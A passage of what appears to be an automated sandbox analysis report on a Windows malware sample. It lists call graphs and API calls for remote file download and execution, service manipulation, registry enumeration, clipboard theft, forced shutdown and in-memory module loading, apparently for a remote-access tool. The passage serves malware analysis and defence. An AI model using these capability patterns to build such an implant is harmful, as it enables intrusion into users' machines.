?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 17176->17179 17180 4082e6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17176->17180 17177->17175 17177->17176 17178->17176 17182 40b692 3 API calls 17179->17182 17181 40b9e8 2 API calls 17180->17181 17183 4082fe 17181->17183 17184 408357 17182->17184 17183->17179 17185 40836e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 17184->17185 17186 40835e GetModuleFileNameW 17184->17186 17187 4083b3 SetFileAttributesW 17185->17187 17188 40839c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 17185->17188 17186->17185 17189 4083c9 17187->17189 17190 4083cc 7 API calls 17187->17190 17188->17187 17189->17190 17191 408491 7 API calls 17190->17191 17192 408434 7 API calls 17190->17192 17193 408502 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 17191->17193 17194 4084f4 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 17191->17194 17192->17191 17195 40854c ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17193->17195 17196 40850c ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17193->17196 17194->17193 17197 412d56 4 API calls 17195->17197 17196->17195 17198 408582 17197->17198 17199 4085a2 exit 17198->17199 17200 408589 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 17198->17200 17200->17199 17201->17162 17202->17165 18886 40ace6 18887 402038 2 API calls 18886->18887 18888 40acfb 18887->18888 18895 40209b connect 18888->18895 18890 40ad10 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 18891 4020c2 23 API calls 18890->18891 18892 40ad41 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 18891->18892 18893 402149 691 API calls 18892->18893 18894 40ad58 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 18893->18894 18895->18890 15581 10541085 15591 105410ac 15581->15591 15583 1054109b 15584 10541248 VirtualAlloc 15583->15584 15590 1054141c 15583->15590 15585 10541278 15584->15585 15586 1054133e GetPEB 15585->15586 15585->15590 15589 10541354 15586->15589 15587 1054140c GetPEB 15587->15590 15588 105413bd LoadLibraryA 15588->15589 15588->15590 15589->15587 15589->15588 15592 105410de 15591->15592 15593 10541248 VirtualAlloc 15592->15593 15599 1054141c 15592->15599 15594 10541278 15593->15594 15595 1054133e GetPEB 15594->15595 15594->15599 15598 10541354 15595->15598 15596 1054140c GetPEB 15596->15599 15597 105413bd LoadLibraryA 15597->15598 15597->15599 15598->15596 15598->15597 15599->15583 22363 40e2b7 22364 40180c 4 API calls 22363->22364 22365 40e2c1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22364->22365 22370 40a2f9 22365->22370 22367 40e2d2 22368 4017dd 3 API calls 22367->22368 22369 40e6a9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22368->22369 22371 402038 2 API calls 22370->22371 22372 40a30b 22371->22372 22382 40209b connect 22372->22382 22374 40a320 22375 40a329 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22374->22375 22376 40a33c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22374->22376 22377 40a34d 22375->22377 22376->22377 22378 4020c2 23 API calls 22377->22378 22379 40a354 22378->22379 22380 402149 691 API calls 22379->22380 22381 40a362 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22380->22381 22381->22367 22382->22374 22561 40a370 6 API calls 22562 4129eb 21 API calls 22561->22562 22563 40a3dc 22562->22563 22564 40a3e8 22563->22564 22565 40a49a 22563->22565 22566 40a466 22564->22566 22567 40a3eb 22564->22567 22568 40180c 4 API calls 22565->22568 22572 40180c 4 API calls 22566->22572 22570 40a415 inet_ntoa 22567->22570 22571 40a3ee 22567->22571 22569 40a4a4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 22568->22569 22573 406dd9 5 API calls 22569->22573 22575 40180c 4 API calls 22570->22575 22577 40a3f1 22571->22577 22601 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 22571->22601 22574 40a470 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 22572->22574 22576 40a4b2 22573->22576 22574->22571 22578 40a42c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 22575->22578 22579 40a591 22576->22579 22594 40a4bd 22576->22594 22580 4017dd 3 API calls 22577->22580 22581 40a443 22578->22581 22583 40180c 4 API calls 22579->22583 22582 40a5da ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22580->22582 22600 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 22581->22600 22585 40a5a6 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 22583->22585 22588 4020c2 23 API calls 22585->22588 22587 40a45d 22591 4020c2 23 API calls 22587->22591 22589 40a58c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22588->22589 22589->22577 22591->22577 22592 40a555 22593 40180c 4 API calls 22592->22593 22595 40a569 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 22593->22595 22594->22592 22596 40a52e 22594->22596 22597 4020c2 23 API calls 22595->22597 22598 40180c 4 API calls 22596->22598 22597->22589 22599 40a53e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22598->22599 22599->22587 22600->22587 22601->22587 22608 404774 22609 404f3b 22608->22609 22612 4018db ??3@YAXPAX 22609->22612 22611 404f61 22612->22611 22660 410f04 6 API calls 22661 4129eb 21 API calls 22660->22661 22662 410f70 22661->22662 22663 411381 22662->22663 22664 4112f1 22662->22664 22666 411264 22662->22666 22667 410f8b 22662->22667 22665 4113c9 51 API calls 22663->22665 22772 412881 7 API calls 22664->22772 22668 41138d 22665->22668 22767 412881 7 API calls 22666->22767 22669 410f92 22667->22669 22670 4111dd 22667->22670 22777 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 22668->22777 22672 410f99 22669->22672 22673 41114c 22669->22673 22762 412881 7 API calls 22670->22762 22677 410fa0 22672->22677 22678 4110b5 22672->22678 22757 412881 7 API calls 22673->22757 22675 411399 22680 4020c2 23 API calls 22675->22680 22695 410fb2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 22677->22695 22727 4111d8 22677->22727 22748 412881 7 API calls 22678->22748 22679 411306 22773 411700 OpenSCManagerW ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ OpenServiceW 22679->22773 22684 4113a7 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22680->22684 22682 411279 22768 411760 OpenSCManagerW ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ OpenServiceW 22682->22768 22684->22727 22685 4017dd 3 API calls 22690 4113bb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22685->22690 22687 4111f2 22763 411859 OpenSCManagerW ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ OpenServiceW 22687->22763 22689 41130d 22696 411362 22689->22696 22708 411314 22689->22708 22691 411161 22758 4118c0 OpenSCManagerW ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ OpenServiceW 22691->22758 22694 411280 22700 4112d2 22694->22700 22701 411287 22694->22701 22702 410fc6 22695->22702 22705 41136b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22696->22705 22698 4110ca 22749 4117c7 OpenSCManagerW ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ OpenServiceW 22698->22749 22699 4111f9 22706 411200 22699->22706 22707 411245 22699->22707 22709 4112db ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22700->22709 22721 4112a1 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 22701->22721 22742 412881 7 API calls 22702->22742 22703 411168 22710 4111b4 22703->22710 22718 41116f 22703->22718 22705->22663 22726 41121a ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 22706->22726 22713 41124e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22707->22713 22712 41132e ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 22708->22712 22709->22664 22720 4111bd ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22710->22720 22716 4020c2 23 API calls 22712->22716 22717 4111ce 22713->22717 22714 410fd2 22743 411927 OpenSCManagerW ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ OpenServiceW 22714->22743 22725 4110ad 22716->22725 22724 4020c2 23 API calls 22717->22724 22729 411189 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 22718->22729 22719 4110d1 22730 4110ef ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D 22719->22730 22720->22717 22722 4020c2 23 API calls 22721->22722 22722->22725 22723 410fd9 22735 410fe4 22723->22735 22736 41106d 22723->22736 22724->22727 22728 41135a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22725->22728 22731 4020c2 23 API calls 22726->22731 22727->22685 22728->22727 22732 4020c2 23 API calls 22729->22732 22733 4020c2 23 API calls 22730->22733 22731->22725 22732->22725 22734 41112f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22733->22734 22734->22728 22739 41100a ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 22735->22739 22737 411087 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 22736->22737 22738 4020c2 23 API calls 22737->22738 22738->22725 22740 4020c2 23 API calls 22739->22740 22741 41104d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 22740->22741 22741->22728 22742->22714 22744 411954 CloseServiceHandle 22743->22744 22746 41195d ChangeServiceConfigW CloseServiceHandle CloseServiceHandle 22743->22746 22745 41199d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22744->22745 22745->22723 22746->22745 22748->22698 22750 411803 ControlService 22749->22750 22751 4117fa CloseServiceHandle 22749->22751 22753 411814 22750->22753 22754 411818 QueryServiceStatus 22750->22754 22752 411849 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22751->22752 22752->22719 22755 41183d CloseServiceHandle CloseServiceHandle 22753->22755 22754->22754 22756 411829 StartServiceW 22754->22756 22755->22752 22756->22755 22757->22691 22759 4118f0 CloseServiceHandle 22758->22759 22760 4118f9 ControlService CloseServiceHandle CloseServiceHandle 22758->22760 22761 411917 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22759->22761 22760->22761 22761->22703 22762->22687 22764 411892 ControlService CloseServiceHandle CloseServiceHandle 22763->22764 22765 411889 CloseServiceHandle 22763->22765 22766 4118b0 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22764->22766 22765->22766 22766->22699 22767->22682 22769 411790 CloseServiceHandle 22768->22769 22770 411799 ControlService CloseServiceHandle CloseServiceHandle 22768->22770 22771 4117b7 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22769->22771 22770->22771 22771->22694 22772->22679 22774 411736 StartServiceW CloseServiceHandle CloseServiceHandle 22773->22774 22775 41172d CloseServiceHandle 22773->22775 22776 411750 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 22774->22776 22775->22776 22776->22689 22777->22675 19780 40dd09 19787 4130bf RegOpenKeyExA 19780->19787 19784 40dd21 19785 4020c2 23 API calls 19784->19785 19786 40dd2f 19785->19786 19788 413103 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ RegEnumKeyExA 19787->19788 19789 4130e9 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 19787->19789 19794 41313c 19788->19794 19790 40dd15 19789->19790 19800 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 19790->19800 19791 4133d7 RegCloseKey ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 19791->19790 19792 41314c RegOpenKeyExA 19793 4133bb RegEnumKeyExA 19792->19793 19792->19794 19793->19794 19794->19791 19794->19792 19794->19793 19795 40b615 RegQueryValueExW malloc RegQueryValueExW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 19794->19795 19801 40b615 RegQueryValueExW 19794->19801 19795->19794 19797 4131d7 ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 19798 4131eb 25 API calls 19797->19798 19799 41336f 7 API calls 19797->19799 19798->19799 19799->19794 19800->19784 19802 40b643 19801->19802 19803 40b67c ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 19801->19803 19802->19803 19804 40b648 malloc RegQueryValueExW 19802->19804 19803->19797 19804->19803 22991 40db3c 22992 40180c 4 API calls 22991->22992 22993 40db47 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 22992->22993 22994 402038 2 API calls 22993->22994 22995 40db5d 22994->22995 23007 40209b connect 22995->23007 22997 40db75 22998 40db91 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22997->22998 22999 40db7d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 22997->22999 23000 40dba3 22998->23000 22999->23000 23001 4020c2 23 API calls 23000->23001 23002 40dbad 23001->23002 23003 402149 691 API calls 23002->23003 23004 40dbbd 23003->23004 23005 4017dd 3 API calls 23004->23005 23006 40e6a9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 23005->23006 23007->22997

                                  Executed Functions

                                  Function 0040D2A6 Relevance: 210.9, APIs: 117, Strings: 3, Instructions: 868sleepfilenetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 370 40d2a6-40d31d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z SetEvent ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z * 2 call 4129eb 373 40de23-40de2a 370->373 374 40d323 370->374 377 40de30 373->377 378 40e3a3-40e3ac 373->378 375 40dd54 374->375 376 40d329-40d32f 374->376 384 40dd56-40dd5c 375->384 381 40e6a1-40e6c1 call 4017dd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 376->381 382 40d335 376->382 379 40de36-40de3c 377->379 380 40e2f7-40e39e call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 4126ef call 40ec69 call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40180c call 412881 call 40180c call 412881 call 40477e call 404f3a 377->380 378->381 383 40e3b2-40e3b9 378->383 379->381 385 40de42-40de4a 379->385 380->381 387 40d4d4-40d4d6 382->387 388 40d33c-40d3f7 GetTickCount call 412718 call 41269b call 412718 call 412660 call 412855 call 40180c ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 6 call 4020c2 382->388 383->381 389 40e3e0-40e3ff call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 404ea7 383->389 390 40e3c0-40e3db call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 403bec 383->390 391 40e542-40e55d call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 4019e1 383->391 392 40e404-40e495 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ StrToIntA call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 4135de ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 412e4e ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 4133fe 383->392 393 40e624-40e629 call 411a24 383->393 394 40e4a4-40e4c7 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi ShowWindow 383->394 395 40e525-40e540 call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 410528 383->395 396 40e5a9-40e5b1 383->396 397 40e62b-40e630 call 411b80 383->397 398 40e4cc-40e520 call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi SetWindowTextW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ call 40ebbe 383->398 399 40e632-40e637 call 411bc8 383->399 400 40e5f6-40e61b call 40180c ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z call 40180c call 411b59 383->400 401 40e639-40e69b call 4030ec call 40180c call 412718 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4020c2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 383->401 402 40e57c-40e58c call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z 383->402 403 40e49d 383->403 404 40e55f-40e57a call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40e7f7 383->404 405 40e59f-40e5a4 call 411bd0 383->405 406 40dd68-40de02 call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4135de ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ URLDownloadToFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 384->406 407 40dd5e-40dd66 Sleep 384->407 419 40de51 385->419 420 40df81-40dfa3 call 40ec0f call 40180c ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 385->420 421 40e093-40e098 385->421 422 40e1a3-40e1cf call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 412553 385->422 423 40e1f4-40e20f call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40ef5a 385->423 424 40e214-40e22f call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40c75e 385->424 425 40e116-40e11b 385->425 426 40e186-40e19e call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 406dd9 385->426 427 40e1ea-40e1ef call 407b1c 385->427 428 40e12d-40e136 OpenClipboard 385->428 429 40defe-40df76 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ MessageBoxW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 385->429 432 40d4db-40d4e0 call 402750 387->432 621 40d3fc-40d484 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 6 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 388->621 523 40e620 389->523 490 40e597-40e59a 390->490 391->490 392->403 393->381 394->381 395->490 430 40e5b3-40e5d2 call 413d3d CreateThread 396->430 431 40e5d7-40e5f1 ShowWindow SetForegroundWindow 396->431 397->381 398->381 399->381 400->523 401->381 402->490 491 40e592 call 40e927 402->491 403->394 404->490 405->381 616 40de04-40de18 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 4085ac 406->616 617 40de1b 406->617 407->384 465 40de53-40de59 419->465 546 40dfc2-40dfd7 call 40180c ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 420->546 547 40dfa5-40dfc0 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 420->547 421->381 518 40e09e-40e114 EmptyClipboard call 40180c ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ GlobalAlloc GlobalLock call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ GlobalUnlock SetClipboardData 421->518 422->381 545 40e1d5-40e1e5 call 406dd9 ??3@YAXPAX@Z 422->545 423->490 424->490 425->381 522 40e121 EmptyClipboard 425->522 542 40e621-40e622 426->542 427->381 428->381 443 40e13c-40e15e GetClipboardData GlobalLock GlobalUnlock CloseClipboard 428->443 429->420 430->381 431->381 432->381 472 40e160 443->472 473 40e165-40e181 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 4020c2 443->473 492 40de65-40dedd call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4135de ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 412e4e 465->492 493 40de5b-40de63 Sleep 465->493 472->473 473->381 490->381 491->490 633 40def6 492->633 634 40dedf-40def3 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 4085ac 492->634 493->465 540 40e127 CloseClipboard 518->540 522->540 523->542 540->428 542->381 545->523 584 40dff8-40e00d call 40180c ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 546->584 585 40dfd9-40dff6 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 546->585 583 40e02c-40e033 ExitWindowsEx 547->583 583->381 607 40e038-40e066 LoadLibraryA GetProcAddress call 40180c ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 584->607 608 40e00f-40e02a call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 584->608 585->583 629 40e072-40e087 call 40180c ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 607->629 630 40e068-40e06a 607->630 608->583 616->617 617->373 640 40d4b0-40d4c9 call 40180c 